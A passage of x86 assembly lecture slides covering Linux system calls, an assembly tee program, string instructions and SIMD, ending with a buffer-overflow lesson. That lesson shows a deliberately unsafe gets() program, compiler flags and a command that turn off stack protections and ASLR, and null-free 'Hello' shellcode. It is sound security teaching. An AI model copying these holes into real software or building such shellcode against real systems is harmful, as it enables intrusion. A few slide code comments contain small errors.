2324 |   \item CPU saves current state in an architecture-specific way, switches to privileged mode, and jumps to the interrupt handler in the kernel
2325 |   \pause
2326 |   \item Software interrupt, instruction {\ttfamily int <number>}, provides a mechanism to make a request to the kernel to do something user program cannot
2327 |   \begin{itemize}
2328 |     \item System call
2329 |   \end{itemize}
2330 | \end{itemize}
2331 | \end{frame}
2332 | 
2333 | \begin{frame}[fragile,t]
2334 | \frametitle{System Call Interface}
2335 | \begin{figure}
2336 | \centering
2337 | \includegraphics[height=0.65\paperheight]{figures/monolithic.png}
2338 | \end{figure}
2339 | \end{frame}
2340 | 
2341 | 
2342 | \begin{frame}[fragile,t]
2343 | \frametitle{Linux System Calls}
2344 | \begin{itemize}
2345 |   \item Currently 346 system calls
2346 |   \item Common ones are {\ttfamily exit(), read(), write(), open(), close(), ioctl(), fork(), execve()}, etc.
2347 |   \pause
2348 |   \begin{itemize}
2349 |   \item Get more obscure as the system call number goes up
2350 |   \item {\ttfamily less /usr/include/asm/unistd\_32.h}
2351 |   \item {\ttfamily man 2 syscalls}
2352 |   \end{itemize}
2353 |   \pause
2354 |   \item Operating System specific convention for making a system call
2355 |   \pause
2356 |   \item On Linux it is:
2357 |   \begin{itemize}
2358 |     \item system call number in {\ttfamily \%eax}
2359 |     \item arguments in order {\ttfamily \%ebx, \%ecx, \%edx, \%esi, \%edi}
2360 |     \item invoke software interrupt with vector {\ttfamily 0x80}: {\ttfamily int \$0x80}
2361 |     \item return value in \%eax
2362 |   \end{itemize}
2363 |   \pause
2364 |   \item All registers preserved except for {\ttfamily \%eax}
2365 |   \item Passes arguments in registers, not the stack like {\ttfamily cdecl}
2366 | \end{itemize}
2367 | \end{frame}
2368 | 
2369 | \begin{frame}[fragile,t]
2370 | \frametitle{Linux System Calls Reference}
2371 | \begin{itemize}
2372 |   \item \url{http://syscalls.kernelgrok.com/}
2373 | \end{itemize}
2374 | \begin{figure}
2375 | \centering
2376 | \includegraphics[height=0.50\paperheight]{figures/syscalls.png}
2377 | \end{figure}
2378 | \end{frame}
2379 | 
2380 | \begin{frame}[fragile,t]
2381 | \frametitle{Example System Calls (example-syscall.S)}
2382 | \mvs
2383 | \begin{gascode}
2384 | .section .text
2385 | _start:
2386 |   # syscall open("foo", O_CREAT | O_WRONLY, 0644);
2387 |   movl $0x05, %eax
2388 |   movl $filename, %ebx
2389 |   movl $0x41, %ecx
2390 |   movl $0644, %edx
2391 |   int $0x80
2392 | 
2393 |   # fd in %eax from open(), move it to %ebx for write()
2394 |   movl %eax, %ebx
2395 | 
2396 |   # syscall write(fd, message, messageLen);
2397 |   movl $0x04, %eax
2398 |   # fd in %ebx from above
2399 |   movl $message, %ecx
2400 |   movl $messageLen, %edx
2401 |   int $0x80
2402 | 
2403 |   # syscall close(fd);
2404 |   movl $0x06, %eax
2405 |   # fd still in %ebx
2406 |   int $0x80
2407 | \end{gascode}
2408 | \end{frame}
2409 | 
2410 | \begin{frame}[fragile,t]
2411 | \frametitle{Example System Calls (example-syscall.S)}
2412 | \mvs
2413 | \begin{gascode}
2414 |   # syscall exit(0);
2415 |   movl $0x01, %eax
2416 |   movl $0x0, %ebx
2417 |   int $0x80
2418 | 
2419 | .section .data
2420 |   filename:   .ascii "foo\0"
2421 |   message:    .ascii "Hello World!\n"
2422 |   .equ messageLen, . - message
2423 | \end{gascode}
2424 | \end{frame}
2425 | 
2426 | \begin{frame}[fragile,t]
2427 | \frametitle{Example System Calls (example-syscall.S) Runtime}
2428 | \mvs
2429 | \begin{textcode}
2430 | $ as example-syscall.S -o example-syscall.o
2431 | $ ld example-syscall.o -o example-syscall
2432 | $ ./example-syscall
2433 | $ cat foo
2434 | Hello World!
2435 | $
2436 | \end{textcode}
2437 | \end{frame}
2438 | 
2439 | \begin{frame}[fragile,t]
2440 | \frametitle{Example System Calls (example-syscall.S) Disassembly}
2441 | \mvs
2442 | \begin{customobjdumpcode}
2443 | $ as example-syscall.S -o example-syscall.o
2444 | $ ld example-syscall.o -o example-syscall
2445 | $ ojbdump -D example-syscall
2446 | 
2447 | Disassembly of section .text:
2448 | 
2449 | 08048074 <_start>:
2450 |  8048074: b8 05 00 00 00        mov    $0x5,%eax
2451 |  8048079: bb b0 90 04 08        mov    $0x80490b0,%ebx
2452 |  804807e: b9 41 00 00 00        mov    $0x41,%ecx
2453 |  8048083: ba a4 01 00 00        mov    $0x1a4,%edx
2454 |  8048088: cd 80                 int    $0x80
2455 |  804808a: 89 c3                 mov    %eax,%ebx
2456 |  804808c: b8 04 00 00 00        mov    $0x4,%eax
2457 |  8048091: b9 b4 90 04 08        mov    $0x80490b4,%ecx
2458 |  8048096: ba 0d 00 00 00        mov    $0xd,%edx
2459 |  804809b: cd 80                 int    $0x80
2460 |  804809d: b8 06 00 00 00        mov    $0x6,%eax
2461 |  80480a2: cd 80                 int    $0x80
2462 |  80480a4: b8 01 00 00 00        mov    $0x1,%eax
2463 |  80480a9: bb 00 00 00 00        mov    $0x0,%ebx
2464 |  80480ae: cd 80                 int    $0x80
2465 | 
2466 | Disassembly of section .data:
2467 | 080490b0 <filename>:
2468 |  80490b0: 66 6f                 outsw  %ds:(%esi),(%dx)
2469 |   ...
2470 | \end{customobjdumpcode}
2471 | \end{frame}
2472 | 
2473 | \section{Program Example: tee}
2474 | 
2475 | \begin{frame}[fragile,t]
2476 | \mvs
2477 | \frametitle{tee (tee.S)}
2478 | \begin{gascode}
2479 | # Tee (tee.S)
2480 | .section .text
2481 | _start:
2482 |   push %ebp
2483 |   mov %esp, %ebp
2484 | 
2485 |   subl $4, %esp       # int fd; on the stack
2486 | 
2487 |   cmpl $2, 4(%ebp)    # if (argc != 2)
2488 |   jne tee_usage       #   goto tee_usage;
2489 | 
2490 |   tee_open:
2491 |   # syscall open(argv[1], O_CREAT|O_WRONLY|O_TRUNC, 0644);
2492 |   movl $0x05, %eax
2493 |   movl 12(%ebp), %ebx
2494 |   movl $0x241, %ecx
2495 |   movl $0644, %edx
2496 |   int $0x80
2497 | 
2498 |   cmpl $0, %eax       # if (%eax < 0)
2499 |   jl tee_exit         #   goto tee_exit;
2500 | 
2501 |   movl %eax, -4(%ebp) # fd = %eax
2502 | \end{gascode}
2503 | \end{frame}
2504 | 
2505 | \begin{frame}[fragile,t]
2506 | \mvs
2507 | \frametitle{tee (tee.S) Continued}
2508 | \begin{gascode}
2509 |   tee_loop:
2510 |     # Read from input: syscall read(0, &c, 1);
2511 |     movl $3, %eax
2512 |     movl $0, %ebx
2513 |     movl $c, %ecx
2514 |     movl $1, %edx
2515 |     int $0x80
2516 | 
2517 |     cmpl $1, %eax       # if (%eax < 1)
2518 |     jl tee_exit         #   goto tee_exit;
2519 | 
2520 |     # Write to file: syscall write(fd, &c, 1);
2521 |     movl $4, %eax
2522 |     movl -4(%ebp), %ebx
2523 |     movl $c, %ecx
2524 |     movl $1, %edx
2525 |     int $0x80
2526 |     # Write to stdout: syscall write(1, &c, 1);
2527 |     movl $4, %eax
2528 |     movl $1, %ebx
2529 |     movl $c, %ecx
2530 |     movl $1, %edx
2531 |     int $0x80
2532 | 
2533 |     jmp tee_loop       # Loop
2534 | \end{gascode}
2535 | \end{frame}
2536 | 
2537 | \begin{frame}[fragile,t]
2538 | \mvs
2539 | \frametitle{tee (tee.S) Continued}
2540 | \begin{gascode}
2541 |   tee_usage:
2542 |   # syscall write(1, usageStr, usageStrLen);
2543 |   movl $4, %eax
2544 |   movl $1, %ebx
2545 |   movl $usageStr, %ecx
2546 |   movl usageStrLen, %edx
2547 |   int $0x80
2548 | 
2549 |   tee_exit:
2550 |   # syscall exit(0);
2551 |   movl $1, %eax
2552 |   movl $0, %ebx
2553 |   int $0x80
2554 | 
2555 | .section .rodata
2556 |   # Usage string and length
2557 |   usageStr:     .ascii "./tee <file>\n"
2558 |   .equ usageStrLen, . - message
2559 | 
2560 | .section .bss
2561 |   # Read character var
2562 |   .comm c, 1
2563 | \end{gascode}
2564 | \end{frame}
2565 | 
2566 | \begin{frame}[fragile,t]
2567 | \mvs
2568 | \frametitle{tee (tee.S) Runtime}
2569 | \begin{textcode}
2570 | $ as tee.S -o tee.o
2571 | $ ld tee.o -o tee
2572 | 
2573 | # Count total number of syscalls while generating a "CSV syscall,no" list
2574 | 
2575 | $ egrep "NR.*$" -o /usr/include/asm/unistd_32.h |
2576 |      cut -b 4- | sed 's/ /,/' | ./tee syscalls.txt | wc
2577 |     346     346    4604
2578 | $ cat syscalls.txt
2579 | restart_syscall,0
2580 | exit,1
2581 | fork,2
2582 | read,3
2583 | write,4
2584 | open,5
2585 | close,6
2586 | waitpid,7
2587 | creat,8
2588 | link,9
2589 | unlink,10
2590 | ...
2591 | \end{textcode}
2592 | \end{frame}
2593 | 
2594 | \section{Advanced Topic 11: Role of libc}
2595 | 
2596 | \begin{frame}[fragile,t]
2597 | \frametitle{{\ttfamily libc} for library functions and system calls}
2598 | \begin{itemize}
2599 |   \item {\ttfamily libc} provides optimized string, formatting, pattern matching, math, date and time, etc. computation functions
2600 |   \item {\ttfamily libc} wraps system calls and provides more-so platform independent data structures and interfaces
2601 |   \begin{itemize}
2602 |     \item file streams: {\ttfamily FILE *, fopen(), fclose(), fread(), fwrite()}
2603 |     \item sockets: {\ttfamily socket(), bind(), accept(), send(), recv()}
2604 |   \end{itemize}
2605 |   \item In other words, {\ttfamily libc} implements the C library of the POSIX standard
2606 |   \vs
2607 |   \pause
2608 |   \item You can choose not to link with libc, only use syscalls, and implement the other functionality yourself (interesting challenge)
2609 |   \vs
2610 |   \pause
2611 |   \item Some I/O operations will be more efficient through {\ttfamily libc} than direct system calls, due to buffering in user space
2612 | \end{itemize}
2613 | \end{frame}
2614 | 
2615 | \begin{frame}[fragile,t]
2616 | \frametitle{{\ttfamily libc} for dynamic memory management (heap)}
2617 | \begin{columns}[T]
2618 | \column{0.7\textwidth}
2619 | \begin{itemize}
2620 |   \item Operating system allocates heap memory for user program
2621 |   \item {\ttfamily libc} {\ttfamily malloc()} and {\ttfamily free()} manages allocations, deallocations, fragmentation of the heap
2622 |   \item Heap grows up, stack grows down
2623 | \end{itemize}
2624 | \column{0.3\textwidth}
2625 | \includegraphics[height=0.70\paperheight]{figures/memlayoutvm.png}
2626 | \end{columns}
2627 | \end{frame}
2628 | 
2629 | 
2630 | 
2631 | \section{Advanced Topic 12: x86 String Operations}
2632 | 
2633 | \begin{frame}[fragile,t]
2634 | \frametitle{Some Overlooked Registers}
2635 | \begin{figure}
2636 | \centering \includegraphics[width=0.85\textwidth]{figures/386state.png}
2637 | \end{figure}
2638 | \end{frame}
2639 | 
2640 | \begin{frame}[fragile,t]
2641 | \mvs
2642 | \frametitle{Special Instructions for {\ttfamily \%esi} and {\ttfamily \%edi}}
2643 | \begin{itemize}
2644 |   \item We've seen {\ttfamily push} and {\ttfamily pop} instructions which manipulate {\ttfamily \%esp} in a special way
2645 |   \item Special string instructions exist for {\ttfamily \%esi} and {\ttfamily \%edi}
2646 |   \begin{itemize}
2647 |     \item {\ttfamily \%esi} is the source string pointer
2648 |     \item {\ttfamily \%edi} is the destination string pointer
2649 |   \end{itemize}
2650 |   \pause
2651 |   \item {\ttfamily movs} does {\ttfamily *\%edi++ = *\%esi++}
2652 |   \item {\ttfamily cmps} does {\ttfamily cmp \%esi++, \%edi++}
2653 |   \item {\ttfamily scas} does {\ttfamily cmp \%eax, \%edi++}
2654 |   \item {\ttfamily lods} does {\ttfamily mov \%esi++, \%eax}
2655 |   \item {\ttfamily stos} does {\ttfamily mov \%eax, \%edi++}
2656 |   \pause
2657 |   \vs
2658 |   \item Instruction size suffix {\ttfamily b, w, l} determines copy, compare, move size and post-increment amount (1, 2, 4)
2659 |   \item DF flag in {\ttfamily \%eflags} determines if it is a \\ post-increment (DF=0) or post-decrement (DF=1)
2660 | \end{itemize}
2661 | \end{frame}
2662 | 
2663 | \begin{frame}[fragile,t]
2664 | \mvs
2665 | \frametitle{Example 1 of String Instructions (example-string1.S)}
2666 | \begin{gascode}
2667 | .section .text
2668 |   cld               # Clear DF, we want to post-increment
2669 | 
2670 |   # Load str1 with 8 of 0xff
2671 | 
2672 |   movl $str1, %edi  # Set up our string destination pointer
2673 | 
2674 |   # Load the first four a byte at a time
2675 |   movb $0xFF, %al
2676 |   stosb             # *(%edi++) = %al
2677 |   stosb             # *(%edi++) = %al
2678 |   stosb             # *(%edi++) = %al
2679 |   stosb             # *(%edi++) = %al
2680 | 
2681 |   # Load the last four with a single dword
2682 |   movl $0xFFFFFFFF, %eax
2683 |   stosl             # *(%edi) = %eax, %esi += 4
2684 | 
2685 |   # Copy str1 to str2
2686 |   movl $str1, %esi  # str1 in the source
2687 |   movl $str2, %edi  # str2 in the destination
2688 |   # Two dword moves copies all 8 bytes
2689 |   movsl
2690 |   movsl
2691 |   # Done!
2692 | \end{gascode}
2693 | \end{frame}
2694 | 
2695 | \begin{frame}[fragile,t]
2696 | \mvs
2697 | \frametitle{Example 1 of String Instructions (example-string1.S) Continued}
2698 | \begin{gascode}
2699 | .section .bss
2700 |   .comm str1, 8
2701 |   .comm str2, 8
2702 | \end{gascode}
2703 | \end{frame}
2704 | 
2705 | \begin{frame}[fragile,t]
2706 | \frametitle{Repeat Prefix for String Instructions}
2707 | \begin{itemize}
2708 |   \item String instructions can be prefixed by \\ {\ttfamily rep, repe/repz, repne/repnz}
2709 |   \item {\ttfamily rep <string instr>}
2710 |   \begin{itemize}
2711 |     \item repeat the string instruction until {\ttfamily \%ecx} is 0
2712 |   \end{itemize}
2713 |   \item {\ttfamily repe/repz <string instr>}
2714 |   \begin{itemize}
2715 |     \item repeat the string instruction until {\ttfamily \%ecx} is 0 or ZF flag is 0
2716 |   \end{itemize}
2717 |   \item {\ttfamily repne/repnz <string instr>}
2718 |   \begin{itemize}
2719 |     \item repeat the string instruction until {\ttfamily \%ecx} is 0 or ZF flag is 1
2720 |   \end{itemize}
2721 |   \item {\ttfamily \%ecx} automatically decremented for you
2722 |   \vs
2723 |   \pause
2724 |   \item Simple, inefficient {\ttfamily memset()}: {\ttfamily rep stosb}
2725 |   \item Simple, inefficient {\ttfamily memcpy()}: {\ttfamily rep movsb}
2726 |   \item Simple, inefficient {\ttfamily strlen()}: {\ttfamily repne scasb}
2727 |   \item Simple, inefficient {\ttfamily strncmp()}: {\ttfamily repe cmpsb}
2728 |   \item Can be better optimized for memory alignment and scan/copy size
2729 | \end{itemize}
2730 | \end{frame}
2731 | 
2732 | \begin{frame}[fragile,t]
2733 | \mvs
2734 | \frametitle{Example 2 of String Instructions (example-string2.S)}
2735 | \begin{gascode}
2736 | .section .text
2737 | .global main
2738 | main:
2739 |   # memset(str, 'A', 48);
2740 |   pushl $48
2741 |   pushl $'A
2742 |   pushl $str
2743 |   call asm_memset
2744 |   addl $12, %esp
2745 | 
2746 |   # str[48] = '\n'; str[49] = '\0';
2747 |   movb $'\n', str+48
2748 |   movb $0, str+49
2749 | 
2750 |   # printf(str);
2751 |   pushl $str
2752 |   call printf
2753 |   addl $4, %esp
2754 | 
2755 |   ret
2756 | \end{gascode}
2757 | \end{frame}
2758 | 
2759 | \begin{frame}[fragile,t]
2760 | \mvs
2761 | \frametitle{Example 2 of String Instructions (example-string2.S) Continued}
2762 | \begin{gascode}
2763 | # void *memset(void *s, int c, size_t n);
2764 | asm_memset:
2765 |   pushl %edi
2766 |   pushl %ebp
2767 |   movl %esp, %ebp
2768 | 
2769 |   movl 12(%ebp), %edi    # %edi = s
2770 |   movl 16(%ebp), %eax    # %eax = c
2771 |   movl 20(%ebp), %ecx    # %ecx = n
2772 | 
2773 |   rep stosb
2774 | 
2775 |   movl 12(%ebp), %eax    # %eax = s
2776 | 
2777 |   movl %ebp, %esp
2778 |   popl %ebp
2779 |   popl %edi
2780 |   ret
2781 | 
2782 | .section .bss
2783 |   .comm str, 50
2784 | \end{gascode}
2785 | \end{frame}
2786 | 
2787 | \begin{frame}[fragile,t]
2788 | \mvs
2789 | \frametitle{Example 2 of String Instructions (example-string2.S) Runtime}
2790 | \begin{textcode}
2791 | $ as example-string2.S -o example-string2
2792 | $ gcc example-string2.o -o example-string2
2793 | $ ./example-string2
2794 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2795 | $
2796 | \end{textcode}
2797 | \end{frame}
2798 | 
2799 | \begin{frame}[fragile,t]
2800 | \mvs
2801 | \frametitle{Back to the opening glibc strlen example}
2802 | \begin{customobjdumpcode}
2803 | 080483cd <glibc_strlen>:
2804 |  80483cd: 57                    push   %edi
2805 | 
2806 |  80483ce: b9 ff ff ff ff        mov    $0xffffffff,%ecx
2807 |  80483d3: b8 00 00 00 00        mov    $0x0,%eax
2808 |  80483d8: 8b 7c 24 08           mov    0x8(%esp),%edi
2809 | 
2810 |  80483dc: fc                    cld    
2811 |  80483dd: f2 ae                 repnz scas %es:(%edi),%al
2812 | 
2813 |  80483df: b8 fe ff ff ff        mov    $0xfffffffe,%eax
2814 |  80483e4: 29 c8                 sub    %ecx,%eax
2815 | 
2816 |  80483e6: 5f                    pop    %edi
2817 |  80483e7: c3                    ret
2818 | \end{customobjdumpcode}
2819 | \begin{itemize}
2820 |   \item Trick is to load {\ttfamily \%ecx} with -1 or {\ttfamily 0xFFFFFFFF}
2821 |   \item Assumption: string is not longer than 4 gigabytes
2822 |   \item Reasonable assumption on 32-bit system
2823 | \end{itemize}
2824 | \end{frame}
2825 | 
2826 | \section{Advanced Topic 13: Three Simple Optimizations}
2827 | 
2828 | \begin{frame}[fragile,t]
2829 | \frametitle{Three Basic Optimizations}
2830 | \mvs
2831 | \begin{itemize}
2832 |   \item Clear a register with {\ttfamily xor} rather than a {\ttfamily mov}
2833 | \vspace{0.5em}
2834 | \begin{customobjdumpcode}
2835 |    0: a1 00 00 00 00        movl    $0x0,%eax
2836 | 
2837 |    0: 31 c0                 xorl    %eax,%eax
2838 | \end{customobjdumpcode}
2839 | \vspace{0.5em}
2840 | \pause
2841 |   \item Use {\ttfamily lea} for general purpose arithmetic when applicable
2842 |   \begin{itemize}
2843 |     \item {\ttfamily lea} calculates the indirect memory address \\ {\ttfamily \%reg + \%reg*(1,2,4,8) + \$constant} \\ and stores the effective address without dereferencing memory
2844 |   \end{itemize}
2845 | \vspace{0.5em}
2846 | \begin{gascode}
2847 |   # Compute expression: %eax + %ebx*2 + 10
2848 |   leal 10(%eax, %ebx, 2), %eax
2849 | \end{gascode}
2850 | \pause
2851 |   \item Use a more efficient loop structure when possible
2852 | \vspace{-1.0em}
2853 | \begin{columns}[T]
2854 | \centering
2855 | \column{0.4\textwidth}
2856 | \begin{gascode*}{fontsize=\fontsize{8}{8}}
2857 | # for (i = 0; i < 10; i++) { ; }
2858 | xorl %ecx, %ecx
2859 | loop:
2860 |   cmpl $10, %ecx
2861 |   jge loop_done
2862 |   nop
2863 |   incl %ecx
2864 |   jmp loop
2865 | loop_done:
2866 | \end{gascode*}
2867 | \column{0.4\textwidth}
2868 | \begin{gascode*}{fontsize=\fontsize{8}{8}}
2869 | # i = 10; do { ; } while(--i != 0);
2870 | movl $10, %ecx
2871 | loop:
2872 |   nop
2873 |   decl %ecx
2874 |   jnz loop
2875 | \end{gascode*}
2876 | \end{columns}
2877 | \end{itemize}
2878 | \end{frame}
2879 | 
2880 | \section{Advanced Topic 14: x86 Extensions}
2881 | 
2882 | \begin{frame}[fragile,t]
2883 | \frametitle{Overview}
2884 | \begin{itemize}
2885 |   \item Separate instruction sets
2886 |   \item x87 floating point unit
2887 |   \begin{itemize}
2888 |     \item 80-bit double-extended precision floating point registers
2889 |     \item add, subtract, multiply, divide, square root, round, cosine, sine, compare, load/store, etc. for floating point numbers
2890 |   \end{itemize}
2891 |   \pause
2892 |   \item Single Instruction Multiple Data (SIMD) instruction sets \\ like MMX, SSE, SSE2, SSE3, SSE4, ...
2893 |   \begin{itemize}
2894 |     \item Single instruction carries out an operation (add, subtract, etc.) on multiple data blocks, a vector
2895 |     \item MMX was a SIMD instruction set for integers
2896 |     \pause
2897 |     \item SSE is SIMD instruction set for integers and floating point
2898 |     \pause
2899 |     \item SSE1 had 32-bit single precision floating point support 
2900 |     \item SSE2 added 64-bit double precision floating point support
2901 |     \pause
2902 |     \item SSE registers are {\%xmm0 - \%xmm7}, each 128-bit
2903 |     \item SSE instructions can treat each register as multiple floats, doubles, chars, shorts, etc.
2904 |   \end{itemize}
2905 | \end{itemize}
2906 | \end{frame}
2907 | 
2908 | \begin{frame}[fragile,t]
2909 | \frametitle{Scalar versus SIMD}
2910 | \begin{figure}
2911 | \includegraphics[width=\textwidth]{figures/simd.png}
2912 | \footnote{\url{http://software.intel.com/en-us/articles/introduction-to-intel-advanced-vector-extensions/}}
2913 | \end{figure}
2914 | \end{frame}
2915 | 
2916 | \section{Advanced Topic 15: Stack-based Buffer Overflows}
2917 | 
2918 | \begin{frame}[fragile,t]
2919 | \frametitle{Classic Insecure Example in C (example-insecure.c)}
2920 | \begin{ccode}
2921 | #include <stdio.h>
2922 | 
2923 | void get_input(void) {
2924 |   char buff[100];
2925 |   gets(buff);
2926 | }
2927 | 
2928 | int main(void) {
2929 |   printf("input: ");
2930 |   get_input();
2931 |   return 0;
2932 | }
2933 | \end{ccode}
2934 | \vs
2935 | \pause
2936 | \begin{textcode}
2937 | $ gcc -fno-stack-protector -z execstack example-insecure.c
2938 |     -o example-insecure
2939 | \end{textcode}
2940 | We'll build this with the GCC stack protector disabled and executable stack (for reasons explained in a few slides)
2941 | \end{frame}
2942 | 
2943 | \begin{frame}[fragile,t]
2944 | \frametitle{Disassembly of {\ttfamily get\_input()}}
2945 | \mvs
2946 | \begin{ccode}
2947 | void get_input(void) {
2948 |   char buff[100];
2949 |   gets(buff);
2950 | }
2951 | \end{ccode}
2952 | \vs
2953 | \begin{customobjdumpcode}
2954 | $ objdump -d example-insecure
2955 | ...
2956 | 08048414 <get_input>:
2957 |                               # Function prologue
2958 |  8048414: 55                  push   %ebp
2959 |  8048415: 89 e5               mov    %esp,%ebp
2960 |                               # Space allocated on the stack for buff[100]
2961 |  8048417: 81 ec 88 00 00 00   sub    $0x88,%esp
2962 |                               # Address of buff in %eax
2963 |  804841d: 8d 45 94            lea    -0x6c(%ebp),%eax
2964 |                               # Pushing &buff onto the stack
2965 |  8048420: 89 04 24            mov    %eax,(%esp)
2966 |                               # gets(buff);
2967 |  8048423: e8 f8 fe ff ff      call   8048320 <gets@plt>
2968 |                               # Function epilogue
2969 |  8048428: c9                  leave  
2970 |  8048429: c3                  ret 
2971 | ...
2972 | \end{customobjdumpcode}
2973 | \end{frame}
2974 | 
2975 | \begin{frame}[fragile,t]
2976 | \frametitle{Stack Frame of {\ttfamily get\_input()}}
2977 | \mvs
2978 | \begin{gascode}
2979 | # Function prologue
2980 | push   %ebp
2981 | mov    %esp,%ebp
2982 | # Space allocated on the stack for buff[100]
2983 | sub    $0x88,%esp
2984 | # Address of buff in %eax
2985 | lea    -0x6c(%ebp),%eax
2986 | # Pushing &buff onto the stack
2987 | mov    %eax,(%esp)
2988 | # gets(buff);
2989 | call   8048320 <gets@plt>
2990 | # Function epilogue
2991 | leave
2992 | ret
2993 | 
2994 | # Stack frame right before call to gets()
2995 | # |    ...    |
2996 | # |  retaddr  |
2997 | # | saved ebp |
2998 | # |    buf    |
2999 | # |    buf    |
3000 | #       .
3001 | # |    buf    |
3002 | # |    buf    |
3003 | # |   &buf    | <- %esp
3004 | \end{gascode}
3005 | \end{frame}
3006 | 
3007 | \begin{frame}[fragile,t]
3008 | \frametitle{Buffer Overflow}
3009 | \mvs
3010 | \begin{itemize}
3011 |   \item With a well-crafted buffer, we can inject instructions into the buffer on the stack, as well as an over-written return address to those instructions
3012 |   \item When {\ttfamily get\_input()} returns, it will return into our injected instructions
3013 | \end{itemize}
3014 | \begin{figure}
3015 | \centering
3016 | \includegraphics[height=0.55\paperheight]{figures/bufferoverflow.png}
3017 | \end{figure}
3018 | \end{frame}
3019 | 
3020 | \begin{frame}[fragile,t]
3021 | \frametitle{Overwriting the Return Address}
3022 | \begin{itemize}
3023 |   \item But how do we pick the return address? What is the address of stuff on the stack anyway?
3024 |   \pause
3025 |   \item Let's write a small program to find out...
3026 | \end{itemize}
3027 | \begin{ccode}
3028 | #include <stdio.h>
3029 | int main(void) {
3030 |   char c;
3031 |   printf("%p\n", &c);
3032 |   return 0;
3033 | }
3034 | \end{ccode}
3035 | \begin{textcode}
3036 | $ gcc example-addrstack.c -o example-addrstack
3037 | $ ./example-addrstack
3038 | 0xbfe3d16f
3039 | $ ./example-addrstack
3040 | 0xbfdef6ff
3041 | $ ./example-addrstack
3042 | 0xbfefbecf
3043 | \end{textcode}
3044 | \pause
3045 | \begin{itemize}
3046 |   \item It's changing every time we run it!
3047 | \end{itemize}
3048 | \end{frame}
3049 | 
3050 | \begin{frame}[fragile,t]
3051 | \frametitle{Address Space Layout Randomization (ASLR)}
3052 | \begin{itemize}
3053 |   \item We just witnessed the effect of ASLR, which randomly initializes the position of code, libraries, heap, and stack in the user program's address space
3054 |   \item However, the addresses were all relatively close to each other, so there is an opportunity for guessing... (16-bits of guessing on 32-bit)
3055 | \pause
3056 |   \item For our purposes, let's turn off ASLR.
3057 | \end{itemize}
3058 | \vs
3059 | \begin{textcode}
3060 | $ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
3061 | $ ./example-addrstack
3062 | 0xbffff28f
3063 | $ ./example-addrstack
3064 | 0xbffff28f
3065 | $ ./example-addrstack
3066 | 0xbffff28f
3067 | \end{textcode}
3068 | \begin{itemize}
3069 |   \item Now we have an idea of where variables on the stack live
3070 | \end{itemize}
3071 | \end{frame}
3072 | 
3073 | \begin{frame}[fragile,t]
3074 | \frametitle{Shellcode}
3075 | \begin{itemize}
3076 |   \item Next step is to write our instructions to inject
3077 |   \item Often called shellcode, because it often spawns a privileged shell
3078 |   \pause
3079 |   \vs\vs
3080 |   \item Must be position-independent
3081 |   \begin{itemize}
3082 |     \item Code cannot rely on absolute addresses for its data, since we're not sure {\bf exactly} where it will live on the stack, just roughly
3083 |   \end{itemize}
3084 |   \pause
3085 |   \item Must contain no newlines, and in other cases, no null bytes
3086 |   \begin{itemize}
3087 |     \item Otherwise {\ttfamily gets()} will stop reading input prematurely
3088 |   \end{itemize}
3089 |   \pause
3090 |   \vs
3091 |   \item Let's make it do {\ttfamily write(1, "Hello!", 6);} and {\ttfamily exit(0);}
3092 | \end{itemize}
3093 | \end{frame}
3094 | 
3095 | \begin{frame}[fragile,t]
3096 | \frametitle{Hello Shellcode Take 1 (example-shellcode1.S)}
3097 | \mvs
3098 | \begin{gascode}
3099 | _start:
3100 |   # Clever way to get string address into %ecx
3101 |   jmp get_str_addr
3102 |   got_str_addr:
3103 |   popl %ecx
3104 | 
3105 |   # write(1, "Hello!", 6);
3106 |   movl $0x04, %eax
3107 |   movl $0x01, %ebx
3108 |   movl $6, %edx
3109 |   int $0x80
3110 |   # exit(0);
3111 |   movl $0x01, %eax
3112 |   # %ebx already zero from above
3113 |   int $0x80
3114 | 
3115 | get_str_addr:
3116 |   call got_str_addr
3117 |   .ascii "Hello!"
3118 | \end{gascode}
3119 | \begin{textcode}
3120 | $ as example-shellcode1.S -o example-shellcode1.o
3121 | $ ld example-shellcode1.o -o example-shellcode1
3122 | $ ./example-shellcode1
3123 | Hello!$
3124 | \end{textcode}
3125 | \end{frame}
3126 | 
3127 | \begin{frame}[fragile,t]
3128 | \frametitle{Hello Shellcode Take 1 (example-shellcode1.S) Disassembly}
3129 | \mvs
3130 | \begin{customobjdumpcode}
3131 | $ objdump -D example-shellcode1
3132 | 
3133 | Disassembly of section .text:
3134 | 
3135 | 08048054 <_start>:
3136 |  8048054: eb 19                 jmp    804806f <get_str_addr>
3137 | 08048056 <got_str_addr>:
3138 |  8048056: 59                    pop    %ecx
3139 |  8048057: b8 04 00 00 00        mov    $0x4,%eax
3140 |  804805c: bb 01 00 00 00        mov    $0x1,%ebx
3141 |  8048061: ba 06 00 00 00        mov    $0x6,%edx
3142 |  8048066: cd 80                 int    $0x80
3143 |  8048068: b8 01 00 00 00        mov    $0x1,%eax
3144 |  804806d: cd 80                 int    $0x80
3145 | 0804806f <get_str_addr>:
3146 |  804806f: e8 e2 ff ff ff        call   8048056 <got_str_addr>
3147 |  8048074: 48                    dec    %eax
3148 |  8048075: 65                    gs
3149 |  8048076: 6c                    insb   (%dx),%es:(%edi)
3150 |  8048077: 6c                    insb   (%dx),%es:(%edi)
3151 |  8048078: 6f                    outsl  %ds:(%esi),(%dx)
3152 |  8048079: 21                    .byte 0x21
3153 | \end{customobjdumpcode}
3154 | \begin{itemize}
3155 |   \item We want to get rid of those null bytes...
3156 | \end{itemize}
3157 | \end{frame}
3158 | 
3159 | \begin{frame}[fragile,t]
3160 | \frametitle{Hello Shellcode Take 2 (example-shellcode2.S)}
3161 | \mvs
3162 | \begin{gascode}
3163 | _start:
3164 |   # Clever way to get string address into %ecx
3165 |   jmp get_str_addr
3166 |   got_str_addr:
3167 |   popl %ecx
3168 | 
3169 |   # write(1, "Hello!", 6);
3170 |   xorl %eax, %eax
3171 |   xorl %ebx, %ebx
3172 |   xorl %edx, %edx
3173 |   incl %ebx
3174 |   addb $4, %al 
3175 |   addb $6, %dl 
3176 |   int $0x80
3177 |   # exit(0);
3178 |   xorl %eax, %eax
3179 |   incl %eax
3180 |   # %ebx already zero from above
3181 |   int $0x80
3182 | 
3183 | get_str_addr:
3184 |   call got_str_addr
3185 |   .ascii "Hello!"
3186 | \end{gascode}
3187 | \begin{textcode}
3188 | $ as example-shellcode2.S -o example-shellcode2.o && ld ...
3189 | $ ./example-shellcode2
3190 | Hello!$
3191 | \end{textcode}
3192 | \end{frame}
3193 | 
